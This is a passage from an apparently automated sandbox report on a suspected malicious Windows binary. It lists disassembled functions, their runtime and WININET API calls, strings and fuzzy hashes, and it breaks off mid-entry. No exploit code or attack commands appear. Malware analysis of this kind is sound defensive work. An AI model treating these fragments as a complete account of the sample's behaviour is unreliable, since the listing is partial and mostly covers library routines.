Part of subcall function 0343F89E: __FF_MSGBANNER.LIBCMT ref: 0343F8B7
Part of subcall function 0343F89E: __NMSG_WRITE.LIBCMT ref: 0343F8BE
Part of subcall function 0343F89E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0343F8E3

_free.LIBCMT ref: 0343FA26

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 5a390401b00e459059d8db38472937817cc0e09b278b59c9834f43b7fc8b1486
Instruction ID: cbe918401e17468c2293fe13aefe068d1283e678db67ac903c8388feba62c059
Opcode Fuzzy Hash: 5a390401b00e459059d8db38472937817cc0e09b278b59c9834f43b7fc8b1486
Instruction Fuzzy Hash: 77110132C40710AFDB21FFB6A804B5A3B98DF4AAA0F14443BE8589F350EA34C455869C

Uniqueness

Uniqueness Score: -1.00%

Function 004189D0, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00418A02

Part of subcall function 0049CCCA: _setlocale.LIBCMT ref: 0049CCDC

_free.LIBCMT ref: 00418A14

Part of subcall function 0049F862: RtlFreeHeap.NTDLL(00000000,00000000,?,0040337B,?,5EBFF6FD), ref: 0049F878

_free.LIBCMT ref: 00418A27
_free.LIBCMT ref: 00418A3A
_free.LIBCMT ref: 00418A4D

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _free$FreeHeapLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 1034197179-0
Opcode ID: 64d717013ac9167524d8d1169cf509c5503bd8fe9585965edf1ea940f5a7b390
Instruction ID: 82a907e37655d383079bbe862dc1ecb4d439ebf518647d60779fdfa65175fd6f
Opcode Fuzzy Hash: 64d717013ac9167524d8d1169cf509c5503bd8fe9585965edf1ea940f5a7b390
Instruction Fuzzy Hash: 97113DF1904B409BDA20EF1A9845A57FBE9EF94710F144E2FE056C3B40E739E9088B56

Uniqueness

Uniqueness Score: -1.00%

Function 004A8736, Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004A8742

Part of subcall function 004A64DD: __getptd_noexit.LIBCMT ref: 004A64E0
Part of subcall function 004A64DD: __amsg_exit.LIBCMT ref: 004A64ED

__getptd.LIBCMT ref: 004A8759
__amsg_exit.LIBCMT ref: 004A8767
__lock.LIBCMT ref: 004A8777
__updatetlocinfoEx_nolock.LIBCMT ref: 004A878B

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: d8449efe47aa884d93a140194f2050baf3a86a64516b1ef06009e1bb75f723e4
Instruction ID: c636c93161ba7f22668fbf6a4bd64ee26d0f3956d8ab347468b4b90323a8fe8b
Opcode Fuzzy Hash: d8449efe47aa884d93a140194f2050baf3a86a64516b1ef06009e1bb75f723e4
Instruction Fuzzy Hash: 15F0F036900B10EAD620BF65AC0370D37A0EF26729F25414FF010A72C2CFAC48018A6E

Uniqueness

Uniqueness Score: -1.00%

Function 03448986, Relevance: 7.5, APIs: 5, Instructions: 34COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 03448992

Part of subcall function 0344672D: __getptd_noexit.LIBCMT ref: 03446730
Part of subcall function 0344672D: __amsg_exit.LIBCMT ref: 0344673D

__getptd.LIBCMT ref: 034489A9
__amsg_exit.LIBCMT ref: 034489B7
__lock.LIBCMT ref: 034489C7
__updatetlocinfoEx_nolock.LIBCMT ref: 034489DB

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: d8449efe47aa884d93a140194f2050baf3a86a64516b1ef06009e1bb75f723e4
Instruction ID: 006e89bc8cb399e0384713aed166625a5f6bffbc30d3ee819a04b948d0afdb08
Opcode Fuzzy Hash: d8449efe47aa884d93a140194f2050baf3a86a64516b1ef06009e1bb75f723e4
Instruction Fuzzy Hash: A0F0F03A905F009EF621FB66A80170E73A07F01361F14417FD510AF3D0CB2A84008E1F

Uniqueness

Uniqueness Score: -1.00%

Function 00418640, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 00417EE0: std::_Lockit::_Lockit.LIBCPMT ref: 00417EFC

Part of subcall function 00417F80: std::_Lockit::_Lockit.LIBCPMT ref: 00417FC9

std::_Lockit::_Lockit.LIBCPMT ref: 0041875F
std::_Lockit::_Lockit.LIBCPMT ref: 004187B3
std::_Lockit::_Lockit.LIBCPMT ref: 004187FE

Strings

HAL9, xrefs: 00418652

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID: HAL9
API String ID: 3382485803-225820728
Opcode ID: ddd66e72618edbc7b7027606dd64e8b248fec50791c95bf75182c2aea82e3422
Instruction ID: acfc901cc97615780045033a7a4eef9f6b330b1b33383b67be461231df3d4950
Opcode Fuzzy Hash: ddd66e72618edbc7b7027606dd64e8b248fec50791c95bf75182c2aea82e3422
Instruction Fuzzy Hash: 3D715775204B019FC714DF28C980A6AB7E1FF8DB14F504A1DE9AA87790DB34F904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 033B8890, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 033B8130: std::_Lockit::_Lockit.LIBCPMT ref: 033B814C

Part of subcall function 033B81D0: std::_Lockit::_Lockit.LIBCPMT ref: 033B8219

std::_Lockit::_Lockit.LIBCPMT ref: 033B89AF
std::_Lockit::_Lockit.LIBCPMT ref: 033B8A03
std::_Lockit::_Lockit.LIBCPMT ref: 033B8A4E

Strings

HAL9, xrefs: 033B88A2

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID: HAL9
API String ID: 3382485803-225820728
Opcode ID: ddd66e72618edbc7b7027606dd64e8b248fec50791c95bf75182c2aea82e3422
Instruction ID: 7a7e86319e9eac31c2d46cd8f30c365d777596c887f435c38308897b133b0a64
Opcode Fuzzy Hash: ddd66e72618edbc7b7027606dd64e8b248fec50791c95bf75182c2aea82e3422
Instruction Fuzzy Hash: 17711479205B019FC714DF28C980A6AF7F5BF89A10F144A5DE95A8BB90DB30B905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 004033E0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00403480

Part of subcall function 0049D92E: std::exception::_Copy_str.LIBCMT ref: 0049D949

__CxxThrowException@8.LIBCMT ref: 00403495

Part of subcall function 0049DFF1: RaiseException.KERNEL32(#3@,?,5EBFF6FD,004BD94C,00403323,?,004CDB30,?,5EBFF6FD), ref: 0049E033

Part of subcall function 00403210: std::exception::exception.LIBCMT ref: 00403246
Part of subcall function 00403210: __CxxThrowException@8.LIBCMT ref: 0040325D

_memmove.LIBCMT ref: 004034DE

Strings

0@, xrefs: 0040348E

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_memmovestd::exception::_
String ID: 0@
API String ID: 163498487-1855383697
Opcode ID: a8694e5d73641c5cf72163d9bac18cadd73da25b2924ca6e9284da076cad17d3
Instruction ID: 4dfb1783f3b69e5ae3e268b5b5a9e7c94d8a1cccfcfc1592a6d241ab192c3941
Opcode Fuzzy Hash: a8694e5d73641c5cf72163d9bac18cadd73da25b2924ca6e9284da076cad17d3
Instruction Fuzzy Hash: 5F419671E00105ABCB14DF69C9816AEBBF9EB45315F20427FE816AB780D778AE04C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 0343D92C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

__realloc_crt.LIBCMT ref: 0343D98B
__realloc_crt.LIBCMT ref: 0343D9A1
RtlEncodePointer.NTDLL(00000000), ref: 0343D9B3

Strings

0@, xrefs: 0343D933

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: __realloc_crt$EncodePointer
String ID: 0@
API String ID: 562370833-1855383697
Opcode ID: 118c86f61b1f0ff33da3e3c7315bc405d6cebba6649133caedeafc12035ca7fd
Instruction ID: e00836699596496ea4e132a79c29a10dbca315efac8d9beb77672de0bc1b9ba6
Opcode Fuzzy Hash: 118c86f61b1f0ff33da3e3c7315bc405d6cebba6649133caedeafc12035ca7fd
Instruction Fuzzy Hash: 68119672D04215AFD701DF69DD84859B7EDEF4A260311047BE406EB360FA75ED508E98

Uniqueness

Uniqueness Score: -1.00%

Function 004044C0, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 24COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004044F7

Part of subcall function 0049C967: std::ios_base::_Tidy.LIBCPMT ref: 0049C988

Strings

`D@, xrefs: 004044E8
D@, xrefs: 004044DA
@~A, xrefs: 004044F1

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::ios_base::_$Ios_base_dtorTidy
String ID: D@$@~A$`D@
API String ID: 3167631304-1276815011
Opcode ID: 7d79606fe50aee8434acd8865009fc089feeebc99a34d3fc352bae3bd0b577a9
Instruction ID: 8d8046fe7036bda8ae51b53726d1d96062a69b526e950cdf15e1cfe4765c704e
Opcode Fuzzy Hash: 7d79606fe50aee8434acd8865009fc089feeebc99a34d3fc352bae3bd0b577a9
Instruction Fuzzy Hash: 32F089F59002019FC710CF04C584666FBA0AF4530CF28C09DD9450B362D376ED86CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004A1589, Relevance: 6.2, APIs: 4, Instructions: 173COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004A1597

Part of subcall function 0049ECDB: __getptd.LIBCMT ref: 0049ECEE

Part of subcall function 004A3E4D: __getptd_noexit.LIBCMT ref: 004A3E4D

__stricmp_l.LIBCMT ref: 004A1604

Part of subcall function 0049ED9B: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0049EDAA

___crtLCMapStringA.LIBCMT ref: 004A165A
___crtLCMapStringA.LIBCMT ref: 004A16DB

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
String ID:
API String ID: 2544346105-0
Opcode ID: 138e8b5eccd3a420b739de3d2fe74093d57312e7dbc23094f1067419692cd2b1
Instruction ID: dbc39106eb3fa7357fad0d13fe178594ca43ad1db4597a61e6d9f49a53628813
Opcode Fuzzy Hash: 138e8b5eccd3a420b739de3d2fe74093d57312e7dbc23094f1067419692cd2b1
Instruction Fuzzy Hash: C3511974D04155ABDF258B64C485BBE7BF4AB63324F28419BE0A29F1F2D2388E42DB15

Uniqueness

Uniqueness Score: -1.00%

Function 034417D9, Relevance: 6.2, APIs: 4, Instructions: 173COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 034417E7

Part of subcall function 0343EF2B: __getptd.LIBCMT ref: 0343EF3E

Part of subcall function 0344409D: __getptd_noexit.LIBCMT ref: 0344409D

__stricmp_l.LIBCMT ref: 03441854

Part of subcall function 0343EFEB: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0343EFFA

___crtLCMapStringA.LIBCMT ref: 034418AA
___crtLCMapStringA.LIBCMT ref: 0344192B

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: Locale$StringUpdateUpdate::____crt$__getptd__getptd_noexit__stricmp_l
String ID:
API String ID: 2544346105-0
Opcode ID: 138e8b5eccd3a420b739de3d2fe74093d57312e7dbc23094f1067419692cd2b1
Instruction ID: 7641ab7b4549e9d02a7897bc88836ed3870e7caec2f84635b83757df4036d764
Opcode Fuzzy Hash: 138e8b5eccd3a420b739de3d2fe74093d57312e7dbc23094f1067419692cd2b1
Instruction Fuzzy Hash: 2751E771904299ABFB25DB65C484BBABBB4AB01314F1C41ABE0B25F2D1D734C982CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004A02AB, Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004A0346
__flush.LIBCMT ref: 004A0364
__write.LIBCMT ref: 004A038B
__flsbuf.LIBCMT ref: 004A03B6

Part of subcall function 004A3E4D: __getptd_noexit.LIBCMT ref: 004A3E4D

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 96153571b4b9a6c1dcc64cbc5e0f9d781c51ece4c4490dcde7ea378ecf871a26
Instruction ID: d90eb91d9102c45d9a24e6439ea8a8f340492e785bf79a7de265355a95fe4a79
Opcode Fuzzy Hash: 96153571b4b9a6c1dcc64cbc5e0f9d781c51ece4c4490dcde7ea378ecf871a26
Instruction Fuzzy Hash: 2C419531A00705DFDF24CF698884A9FBBB5AFA2314F24856FE81597290D779DD41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 03437160, Relevance: 6.1, APIs: 4, Instructions: 121sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064,004C9674,00000024,004D479C), ref: 034371D9
__time64.LIBCMT ref: 034371E0

Part of subcall function 0343EC9C: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,034371E5,00000000), ref: 0343ECA7
Part of subcall function 0343EC9C: __aulldiv.LIBCMT ref: 0343ECC7

Part of subcall function 03434880: _malloc.LIBCMT ref: 03434887
Part of subcall function 03434880: GetTickCount.KERNEL32 ref: 03434894
Part of subcall function 03434880: _rand.LIBCMT ref: 034348B0
Part of subcall function 03434880: _sprintf.LIBCMT ref: 034348C5

Part of subcall function 034416D8: __getptd.LIBCMT ref: 034416DD

_rand.LIBCMT ref: 03437215

Part of subcall function 034416EA: __getptd.LIBCMT ref: 034416EA

std::_Xinvalid_argument.LIBCPMT ref: 0343722C

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: Time__getptd_rand$CountFileSleepSystemTickXinvalid_argument__aulldiv__time64_malloc_sprintfstd::_
String ID:
API String ID: 3490354527-0
Opcode ID: 4636458625f771c8294d685b6f82f2ad4f107bf0e45e3de305ca4381bf337d6f
Instruction ID: d86146056cf3f0dc5514acc4e6bbb4c8223c606352dc2a9b355dc4281c8aa969
Opcode Fuzzy Hash: 4636458625f771c8294d685b6f82f2ad4f107bf0e45e3de305ca4381bf337d6f
Instruction Fuzzy Hash: 8C41AFB5A04344AFDB14DF99D884BAEBBB9FB8A700F10012EE4526F380D7B55944CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004B281A, Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004B284E
__isleadbyte_l.LIBCMT ref: 004B2881
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036ACC,00BFBBEF,00000000,?,?,?,004B0CA4,00000109,00BFBBEF,00000003), ref: 004B28B2
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,004B0CA4,00000109,00BFBBEF,00000003), ref: 004B2920

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 57605e52b9f923864393c02027fdfdb758bbf0e538145e245a8bf274d5469bde
Instruction ID: c948a2d28b0f525412f1619d97b7813badffa81f9b34bb8dc15d3e11f6e997dc
Opcode Fuzzy Hash: 57605e52b9f923864393c02027fdfdb758bbf0e538145e245a8bf274d5469bde
Instruction Fuzzy Hash: AC31D331A00245EFDB11EF68C9909EE3BA1FF01310F1486AAE4659B2A1D375DD40DB69

Uniqueness

Uniqueness Score: -1.00%

Function 03452A6A, Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03452A9E
__isleadbyte_l.LIBCMT ref: 03452AD1
MultiByteToWideChar.KERNEL32(00000000,00000009,0000000C,00000000,033BFE1C,00000000,?,?,?,004D12A8,0000000C,033BFE1C), ref: 03452B02
MultiByteToWideChar.KERNEL32(00000000,00000009,0000000C,00000001,033BFE1C,00000000,?,?,?,004D12A8,0000000C,033BFE1C), ref: 03452B70

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 57605e52b9f923864393c02027fdfdb758bbf0e538145e245a8bf274d5469bde
Instruction ID: cdef350c56e7638ea39ecc0f5193f1cc2301d7ee2866387a46f5893071c29586
Opcode Fuzzy Hash: 57605e52b9f923864393c02027fdfdb758bbf0e538145e245a8bf274d5469bde
Instruction Fuzzy Hash: CD31B531E00256EFDB20DFA5C88497E7BA5FF01210F1889ABF8659F292E770D941CB55

Uniqueness

Uniqueness Score: -1.00%

Function 033B5ED0, Relevance: 6.1, APIs: 4, Instructions: 93networkCOMMON

Download Yara Rule

APIs

HttpAddRequestHeadersA.WININET(?,004D479C,?,20000000), ref: 033B5F50
HttpAddRequestHeadersA.WININET(?,004D479C,?,20000000), ref: 033B5F80
HttpAddRequestHeadersA.WININET(?,004D479C,?,20000000), ref: 033B5FB0
HttpAddRequestHeadersA.WININET(?,004D479C,?,20000000), ref: 033B5FE0

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: HeadersHttpRequest
String ID:
API String ID: 1754618566-0
Opcode ID: 87f1535d3a6bcdba66fae1f13d6e1e3a7f49966f2a275a0d85859c8bcf9c27e7
Instruction ID: a61c5f25b342348a10abbce1a2b75603df35afb566876e335ec00c825c20c021
Opcode Fuzzy Hash: 87f1535d3a6bcdba66fae1f13d6e1e3a7f49966f2a275a0d85859c8bcf9c27e7
Instruction Fuzzy Hash: E7312C75508700AFE301DF54D885FABF3E8FB89714F508A2EF59996280D774EA08CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0049A3F0, Relevance: 6.1, APIs: 4, Instructions: 83timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,0049BE34,00000000,00000000,00000010,00000000), ref: 0049A431
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0049BE34,00000000,00000000,00000010,00000000), ref: 0049A441
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0049BE34,00000000,00000000,00000010,00000000), ref: 0049A461
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0049A483

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: 8bcc0f9aa08d9b569ca8b7ec7c7005c64215703d78fff269b3c364a681e16fb9
Instruction ID: 48dee8218d911155c5a1f3eae98b800a08a4a803e5c74d45d53892861e0d2062
Opcode Fuzzy Hash: 8bcc0f9aa08d9b569ca8b7ec7c7005c64215703d78fff269b3c364a681e16fb9
Instruction Fuzzy Hash: 9F31E4B59087009FD318CF2AC89096BBBE5FB88354F408A2EE5AAC7650D774E509CB56

Uniqueness

Uniqueness Score: -1.00%

Function 033B8B70, Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 033B8B9E
std::exception::exception.LIBCMT ref: 033B8BDD

Part of subcall function 0343DB7E: std::exception::_Copy_str.LIBCMT ref: 0343DB99

__CxxThrowException@8.LIBCMT ref: 033B8BF4

Part of subcall function 0343E241: RaiseException.KERNEL32(033A3573,?,004D479C,004BD94C,033A3573,?,004CDB30,?,004D479C), ref: 0343E283

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 033B8BFB

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID:
API String ID: 73090415-0
Opcode ID: 2ec8270fd6705c48a955d560b4f1a5fdb5ca6178796cfce063d38611fd4f3613
Instruction ID: 19a476efe097e5b2b276c677d3af59058e9a70cc5e76fc92829e2f5e79db2c87
Opcode Fuzzy Hash: 2ec8270fd6705c48a955d560b4f1a5fdb5ca6178796cfce063d38611fd4f3613
Instruction Fuzzy Hash: 2A1194B55087819FC310DF29C880A47FBE8FF59610F408A6FF49997740D734A908CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004ABE84, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 004ABEAA

Part of subcall function 004ABCD6: __fltout2.LIBCMT ref: 004ABD01

__cftog_l.LIBCMT ref: 004ABED0
__cftoe_l.LIBCMT ref: 004ABF02

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: ee5ae5202b9b14a1a15d3d85028724bd9e1f8a31701a0e1ded93ec768f088dfe
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: B8116D3200004EBBCF125E95CC41CEE3F22FB2A354B18841AFA1898132D33AC9B1AB85

Uniqueness

Uniqueness Score: -1.00%

Function 0344C0D4, Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0344C0FA

Part of subcall function 0344BF26: __fltout2.LIBCMT ref: 0344BF51

__cftog_l.LIBCMT ref: 0344C120
__cftoe_l.LIBCMT ref: 0344C152

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 8c398c425a207bd53888a908344f1b4d2d747af2077f12377023ef5655c49450
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 78114E7600114ABBDF129E85CC81CEE7F66FB18254F488426FA5899231C336C9B1AF89

Uniqueness

Uniqueness Score: -1.00%

Function 004B2707, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,004A96C5,00000000,00000000,76D25970,?,0049FA79,?,00000000), ref: 004B270A
__malloc_crt.LIBCMT ref: 004B2739
FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,00000000,?,0049FA79,?,00000000), ref: 004B2746

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: b690ecbc44b80ae09973489afa3fee34b5cd5a516d8dfdd8a892c93163f7f969
Instruction ID: 4707452003e76bb84e4a03ed328609a58696106d5eb8bddedf4e82e2f72fcf16
Opcode Fuzzy Hash: b690ecbc44b80ae09973489afa3fee34b5cd5a516d8dfdd8a892c93163f7f969
Instruction Fuzzy Hash: 3CF082775101116A8F317779BD898DB6738DAE636531A452BF801C3241FEA88D8286BE

Uniqueness

Uniqueness Score: -1.00%

Function 03434880, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03434887

Part of subcall function 0343F89E: __FF_MSGBANNER.LIBCMT ref: 0343F8B7
Part of subcall function 0343F89E: __NMSG_WRITE.LIBCMT ref: 0343F8BE
Part of subcall function 0343F89E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0343F8E3

GetTickCount.KERNEL32 ref: 03434894

Part of subcall function 034416D8: __getptd.LIBCMT ref: 034416DD

_rand.LIBCMT ref: 034348B0

Part of subcall function 034416EA: __getptd.LIBCMT ref: 034416EA

_sprintf.LIBCMT ref: 034348C5

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: __getptd$AllocateCountHeapTick_malloc_rand_sprintf
String ID:
API String ID: 2210831635-0
Opcode ID: d60f38720ba14f3c02c3ebe1df44cbcfe957b40b2b4d1a38e2327da34b18299f
Instruction ID: 5e4cfc88d8e65e6d8394d3a92cb519a367d66f47dceb88cd228492eb10a33caa
Opcode Fuzzy Hash: d60f38720ba14f3c02c3ebe1df44cbcfe957b40b2b4d1a38e2327da34b18299f
Instruction Fuzzy Hash: 87F02B977013901BE711A6EA5C44F87AA4CCFA6250F08087FF2088F311E664C85083BB

Uniqueness

Uniqueness Score: -1.00%

Function 00494970, Relevance: 6.0, APIs: 4, Instructions: 33fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 0049498B
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,5EBFF6FD), ref: 0049499E
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,5EBFF6FD), ref: 004949A9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,5EBFF6FD), ref: 004949BA

Memory Dump Source

Source File: 00000000.00000002.328349359.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 65e8051f37bbb187dd0ae95f6e53c0380e111074b7e90d9d916fc68dc20804c3
Instruction ID: c97dfe2a122165d9ca1f7d023ab4d0d8be83c3ea1cf99fa560dcbff2b812229e
Opcode Fuzzy Hash: 65e8051f37bbb187dd0ae95f6e53c0380e111074b7e90d9d916fc68dc20804c3
Instruction Fuzzy Hash: 27F08235640210BBE210EF38EC4DF8B7B94AB94B15F048634F944A22D0E630992986AA

Uniqueness

Uniqueness Score: -1.00%

Function 03434BC0, Relevance: 6.0, APIs: 4, Instructions: 33fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 03434BDB
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,004D479C), ref: 03434BEE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004D479C), ref: 03434BF9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004D479C), ref: 03434C0A

Memory Dump Source

Source File: 00000000.00000002.329602451.00000000033A0000.00000040.00000001.sdmp, Offset: 033A0000, based on PE: false

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 65e8051f37bbb187dd0ae95f6e53c0380e111074b7e90d9d916fc68dc20804c3
Instruction ID: df2b4653e7b079f290fc8980dfc901904ca0dae45174271246c038874e17651a
Opcode Fuzzy Hash: 65e8051f37bbb187dd0ae95f6e53c0380e111074b7e90d9d916fc68dc20804c3
Instruction Fuzzy Hash: 55F0A735640210BBE210FF3CEC4DFCB7794AF59B15F048625F944A72D0E6309929C6BA

Uniqueness

Uniqueness Score: -1.00%

Function 033A3630, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 033A36D0

Part of subcall function 0343DB7E: std::exception::_Copy_str.LIBCMT ref: 0343DB99

